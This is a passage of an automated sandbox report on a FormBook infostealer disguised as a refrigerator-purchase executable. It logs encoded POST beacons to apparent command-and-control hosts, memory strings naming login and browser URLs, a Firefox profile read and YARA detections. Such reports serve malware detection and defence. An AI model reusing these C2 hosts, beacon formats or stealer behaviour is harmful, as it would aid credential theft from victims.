            Source: unknownHTTP traffic detected: POST /z4qr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Length: 199Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheHost: www.thesnusgang.funOrigin: http://www.thesnusgang.funReferer: http://www.thesnusgang.fun/z4qr/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0Data Raw: 51 54 3d 34 62 78 41 73 39 57 49 63 7a 4a 6e 6a 65 78 77 47 70 30 76 65 57 6d 50 32 43 42 37 74 46 57 77 61 69 6a 44 37 33 4b 4c 61 45 48 2f 35 41 57 76 6f 53 79 7a 61 61 38 7a 76 37 57 62 4f 69 48 74 49 70 30 42 74 6b 30 53 39 76 70 4c 70 6f 71 6b 30 74 67 5a 76 53 57 4b 64 5a 76 33 75 51 49 72 36 38 54 32 61 31 61 51 58 64 46 37 46 6c 4c 53 33 45 63 2b 74 6b 78 37 77 4e 67 42 37 6b 4f 49 55 44 77 34 77 4d 67 67 70 2f 48 4e 30 2b 75 31 71 48 31 59 75 44 70 2b 76 38 77 65 77 56 57 42 59 6d 6e 45 77 69 73 42 61 63 67 36 48 77 33 34 70 54 66 58 75 2b 4e 44 59 58 37 50 66 6a 38 53 5a 41 3d 3d Data Ascii: QT=4bxAs9WIczJnjexwGp0veWmP2CB7tFWwaijD73KLaEH/5AWvoSyzaa8zv7WbOiHtIp0Btk0S9vpLpoqk0tgZvSWKdZv3uQIr68T2a1aQXdF7FlLS3Ec+tkx7wNgB7kOIUDw4wMggp/HN0+u1qH1YuDp+v8wewVWBYmnEwisBacg6Hw34pTfXu+NDYX7Pfj8SZA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 17:48:27 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:48:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nw9AzNricR9S9HnW0Vp2n74qEIfLP4sy8XcFWeC5DG27sL4iTUYIiXNt9XAICejIs6nTp8jfHMlU7iotzNcDkYJKrt0Y1bhoeqtsl58du%2FENfhg0NPXWk8eGJYrJzDB3QlGS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff119ad837ebbd-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=143156&min_rtt=143156&rtt_var=71578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=705&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:49:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3pm5Y0CHbBeIGgtWgHYDtlH720KCwconnEncyLjZHcqIbinvD7zmNbOpDrALMyLTRlXYf2perzsnXdrdq1DACbBz9Ty0zd93zwC%2BBE53uG1kYI8Rw%2FdnYxYlFWOKUj2OvSA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff11acded5d755-NRTContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=277463&min_rtt=277463&rtt_var=138731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=725&delivery_rate=0&cwnd=40&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:49:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjbblhRlSXwaxKyCABD1MxWA%2FCC%2B7w%2BR9%2FGXd4NbKs%2BrjiKy162%2FdBoUSm7uWKmt5jeKXEPLJigHMHox0Kra498nLInCTks4dp3pdPD2FldTTXQ6Pzw%2FNwxFV1V%2BAF11Vf8B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff11bd2bd4a24a-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=142822&min_rtt=142822&rtt_var=71411&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7874&delivery_rate=0&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:49:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=clEowAA6yD3UC5pVr53RZJzp%2F9U8AwE0MIOttb6%2BJ291iABAoFtw4sXjXr%2FhymTjtdiCo%2FNfBcbBod8JelC%2FP8%2F6BFjT3A5q%2BLbxmslRgQH4%2FM8Q9QarMlQqgrJv9VDRvfLU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eff11ce49d06ac1-SEAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=182025&min_rtt=182025&rtt_var=91012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=442&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:49:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:49:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:49:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 17:49:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: EIyKLgVzlk.exe, 00000005.00000002.65193414239.0000000001588000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.freshteps.life
            Source: EIyKLgVzlk.exe, 00000005.00000002.65193414239.0000000001588000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.freshteps.life/qp01/
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: X0a-0531.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: X0a-0531.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.000000000301D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412184304.0000000003027000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000003008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
            Source: xwizard.exe, 00000004.00000003.64411163696.0000000007FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: xwizard.exe, 00000004.00000002.65195625577.0000000005FEC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65196526701.0000000007D20000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65195625577.0000000005E5A000.00000004.10000000.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003EEC000.00000004.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65195057991.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: xwizard.exe, 00000004.00000003.64416814312.0000000007FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008033000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000000.63929637279.0000000000544000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_13a41a19-f
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000000.63929637279.0000000000544000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ed357cfb-9
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2ad146dd-e
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_8d427734-f
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63942162359.0000000003EE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945428581.00000000040DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@8/5
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeFile created: C:\Users\user\AppData\Local\Temp\aut8413.tmpJump to behavior
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: xwizard.exe, 00000004.00000002.65196596495.0000000007FD9000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64416814312.0000000007FD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
